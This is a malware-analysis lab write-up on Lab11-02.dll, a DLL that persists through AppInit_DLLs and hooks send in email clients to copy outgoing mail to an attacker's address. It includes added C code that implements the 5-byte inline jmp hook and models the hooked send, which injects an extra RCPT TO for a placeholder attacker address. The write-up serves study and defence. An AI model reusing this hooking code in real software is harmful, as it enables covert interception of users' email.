Tools Used

  1. IDA Pro
  2. Procmon
  3. Ollydbg
  4. Wireshark


  1. Lab11-02.dll SHA256: df899256c4a9fc0e550c62b84ab9cb8acd8d18683f0a41c98ba83f0487d4766e


  • Detection Rate: 8/54
  • Analyzed on 2016-03-11
  • Compilation Date: 2011-11-06 21:50:12

Lab 11-2
Analyze the malware found in Lab11-02.dll. Assume that a suspicious file
named Lab11-02.ini was also found with this malware.
1. What are the exports for this DLL malware?

Figure 1. Exports

2. What happens after you attempt to install this malware using

Figure 2. Set Registry & WriteFile

The malware writes the AppInit_DLLs value under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows.

It then copies itself (the DLL) to C:\Windows\System32\spoolvxx32.dll.

The malware then tries to open C:\Windows\System32\Lab11-02.ini.

3. Where must Lab11-02.ini reside in order for the malware to install

Figure 3. Loads config file

The malware attempts to load its configuration from C:\Windows\System32\Lab11-02.ini, so the .ini file has to be placed in the System32 folder for the install to succeed.

4. How is this malware installed for persistence?

According to MSDN, AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into user-mode processes on the system; more precisely, into every process that loads user32.dll, which covers almost every GUI application. By adding the copied DLL to AppInit_DLLs under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, the malicious DLL is loaded into each such process that starts after the change, and the DllMain code runs inside every one of them. Two caveats when reproducing this: on Windows 7 and later the LoadAppInit_DLLs value in the same key must be 1 for the list to be honored at all, and on Windows 8 and later with Secure Boot enabled the mechanism is disabled entirely, so this persistence only works on older or deliberately weakened systems.

5. What user-space rootkit technique does this malware employ?

If we look at the subroutine @0x100012A3, you will see that it attempts to resolve the address of send from wsock32.dll. It then passes that address to the subroutine @0x10001203.

The subroutine @0x10001203 implements an inline hook. It first computes the relative offset from the patch location (the first bytes of send) to the hook function it wants to jump to. It then uses VirtualProtect to set the 5 bytes at the start of send to PAGE_EXECUTE_READWRITE, overwrites those bytes with a jmp to the hook function, and finally restores the original protection on those 5 bytes. Five bytes is exactly the size of an x86 near relative jmp (opcode E9 plus a 32-bit displacement), which is why that is the amount of memory made writable.
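To make the 5-byte patch concrete, the following is an added example written for this write-up, not code from the sample. It reproduces the arithmetic and the byte layout that sub_10001203 performs on send, but against a plain byte array instead of live process memory, so it runs anywhere; the VirtualProtect call has no portable equivalent and is left out, and the two addresses in main are made-up 32-bit values, not addresses from the lab.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define JMP_REL32_LEN 5   /* E9 xx xx xx xx: near relative jmp on x86 */

/* The displacement in an E9 jmp is relative to the END of the jmp
 * instruction, so it is target - (patch_addr + 5), not target - patch_addr.
 * Getting this off by five is the classic inline-hook bug. */
int32_t jmp_rel32(uint32_t patch_addr, uint32_t target_addr)
{
    return (int32_t)(target_addr - (patch_addr + JMP_REL32_LEN));
}

/* Overwrite the first 5 bytes at 'code' (the bytes that live at patch_addr)
 * with a jmp to target_addr, saving what was there for a later unhook. */
void install_inline_hook(uint8_t *code, uint32_t patch_addr,
                         uint32_t target_addr, uint8_t saved[JMP_REL32_LEN])
{
    uint32_t rel = (uint32_t)jmp_rel32(patch_addr, target_addr);
    memcpy(saved, code, JMP_REL32_LEN);
    code[0] = 0xE9;
    code[1] = (uint8_t)(rel & 0xFF);          /* little-endian displacement */
    code[2] = (uint8_t)((rel >> 8) & 0xFF);
    code[3] = (uint8_t)((rel >> 16) & 0xFF);
    code[4] = (uint8_t)((rel >> 24) & 0xFF);
}

/* Put the original prologue back: needed before calling the real function. */
void remove_inline_hook(uint8_t *code, const uint8_t saved[JMP_REL32_LEN])
{
    memcpy(code, saved, JMP_REL32_LEN);
}

/* Round-trip check on a fake prologue (constructed bytes, not send's real
 * prologue): hook, verify the jmp, unhook, verify the bytes are restored.
 * Returns 1 on success, 0 on any mismatch. */
int inline_hook_selfcheck(void)
{
    uint8_t fn[8] = { 0x8B, 0xFF, 0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x10 };
    uint8_t orig[8];
    uint8_t saved[JMP_REL32_LEN];
    memcpy(orig, fn, sizeof fn);

    install_inline_hook(fn, 0x1000u, 0x2000u, saved);
    /* 0x2000 - (0x1000 + 5) = 0xFFB -> E9 FB 0F 00 00 */
    const uint8_t want[JMP_REL32_LEN] = { 0xE9, 0xFB, 0x0F, 0x00, 0x00 };
    if (memcmp(fn, want, JMP_REL32_LEN) != 0) return 0;
    if (memcmp(fn + JMP_REL32_LEN, orig + JMP_REL32_LEN, 3) != 0) return 0;

    remove_inline_hook(fn, saved);
    return memcmp(fn, orig, sizeof fn) == 0;
}

int main(void)
{
    /* Hypothetical 32-bit addresses: where send's code sits and where the
     * hook function sits. These are illustrative, not from the sample. */
    uint32_t send_addr = 0x71A24C27u, hook_addr = 0x1000113Du;
    uint8_t code[JMP_REL32_LEN] = {0}, saved[JMP_REL32_LEN];
    install_inline_hook(code, send_addr, hook_addr, saved);
    printf("patch at %08X -> %08X: ", send_addr, hook_addr);
    for (int i = 0; i < JMP_REL32_LEN; i++) printf("%02X ", code[i]);
    printf("(selfcheck %s)\n", inline_hook_selfcheck() ? "ok" : "FAILED");
    return 0;
}
```

Because the patch destroys send's first five bytes, a hook that later needs the real send (as this one does when it forwards the message) must either restore the saved bytes first or run them from a trampoline; a hook that just calls the patched address again recurses into itself.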

Figure 4. inline hook

However, even though the DLL is loaded into many processes, it only installs the hook when the host process's executable name is one of three: THEBAT.EXE, OUTLOOK.EXE or MSIMM.EXE. 

Figure 5. Hook selected programs

To conclude, the malware places an inline hook on wsock32.dll's send function, but only inside those selected programs.


6. What does the hooking code do?

We first look at what the malware is retrieving from the config file.

Figure 6. Decoding config

After reading the data from the config file, the malware decodes it by calling the subroutine @0x100016CA. If we dive into this subroutine, we find that it is an XOR decoding routine. Let's set a breakpoint after it in OllyDbg to see what comes out.

Figure 7.

This decoded string is then used by the following function.

Figure 8. replacing send data

The inline hook jumps to the function above. It starts by checking whether the outgoing send buffer contains the string "RCPT TO". If it does, it builds a new buffer of the form "RCPT TO:<address decoded from the .ini>\r\n" and sends it via the original send function. The function then finishes by forwarding the original, unmodified data to send. The net effect is that the attacker's address is added as an extra SMTP recipient; the legitimate recipient is not removed.
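The exchange described above, modelled as an added example (not the sample's own code): send is represented by a function pointer so the "original send" can be a stub that records what it was handed, each SMTP command is delivered in its own send call as a real mail client does, and the attacker address is a placeholder standing in for whatever was decoded from Lab11-02.ini.

```c
#include <stdio.h>
#include <string.h>

/* Signature shape of wsock32 send(), minus the Windows types. */
typedef int (*send_fn)(int sock, const char *buf, int len, int flags);

/* Everything the stub "original send" is given ends up here (demo only). */
static char g_wire[512];
static int  g_wire_len;

static int original_send(int sock, const char *buf, int len, int flags)
{
    (void)sock; (void)flags;
    if (len < 0 || g_wire_len + len >= (int)sizeof g_wire) return -1;
    memcpy(g_wire + g_wire_len, buf, (size_t)len);
    g_wire_len += len;
    g_wire[g_wire_len] = '\0';
    return len;
}

/* Model of the function the jmp lands in. If the buffer carries an RCPT TO
 * command, first emit an extra RCPT TO for the attacker through the original
 * send, then forward the caller's buffer untouched. Anything else passes
 * straight through. The search is length-bounded because send buffers are
 * not NUL-terminated. */
int hooked_send(send_fn orig, const char *attacker, int sock,
                const char *buf, int len, int flags)
{
    static const char needle[] = "RCPT TO";
    const int nlen = (int)sizeof needle - 1;
    int found = 0;
    for (int i = 0; i + nlen <= len; i++) {
        if (memcmp(buf + i, needle, (size_t)nlen) == 0) { found = 1; break; }
    }
    if (found) {
        char extra[256];
        int n = snprintf(extra, sizeof extra, "RCPT TO:<%s>\r\n", attacker);
        if (n > 0 && n < (int)sizeof extra)
            orig(sock, extra, n, flags);      /* the injected recipient */
    }
    return orig(sock, buf, len, flags);       /* original data, unchanged */
}

/* Drive the hook with a constructed SMTP envelope and return what reached
 * the "wire". The addresses are made up for the demo. */
const char *run_hook_demo(void)
{
    static const char *cmds[] = {
        "MAIL FROM:<victim@example.test>\r\n",
        "RCPT TO:<boss@example.test>\r\n",
        "DATA\r\n",
    };
    g_wire_len = 0; g_wire[0] = '\0';
    for (size_t i = 0; i < sizeof cmds / sizeof cmds[0]; i++)
        hooked_send(original_send, "attacker@placeholder.test", 1,
                    cmds[i], (int)strlen(cmds[i]), 0);
    return g_wire;
}

int main(void)
{
    fputs(run_hook_demo(), stdout);
    return 0;
}
```

Run stand-alone, it prints the envelope with the attacker's RCPT TO inserted before the victim's, which is exactly the extra command you would expect to see in the SMTP stream captured in question 9. A crude substring match like this one also fires if "RCPT TO" happens to appear inside the message body during the DATA phase, where a stray RCPT command is a protocol error; the sample does not appear to guard against that.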

7. Which process(es) does this malware attack and why?

As answered in question 5, the malware only hooks three programs: THEBAT.EXE, OUTLOOK.EXE and MSIMM.EXE. They are all email clients, which is where a hook on send will see outgoing SMTP traffic.

8. What is the significance of the .ini file?

As shown in question 6, Lab11-02.ini contains the XOR-encoded attacker email address. The hook uses the decoded address to inject an additional RCPT TO command into the SMTP session, so every message sent from a hooked client is also delivered to the attacker. Without the .ini file in System32 the malware has no address to inject and the install fails.

9. How can you dynamically capture this malware’s activity with Wireshark?

Set up INetSim so that its SMTP service answers the victim VM's mail traffic, install the malware, then send an email from Outlook Express while Wireshark is capturing on the VM. Filtering on smtp shows the session to the fake server, including the extra RCPT TO line for the attacker's address that the hook inserts alongside the real recipient.

Figure 9. Wireshark


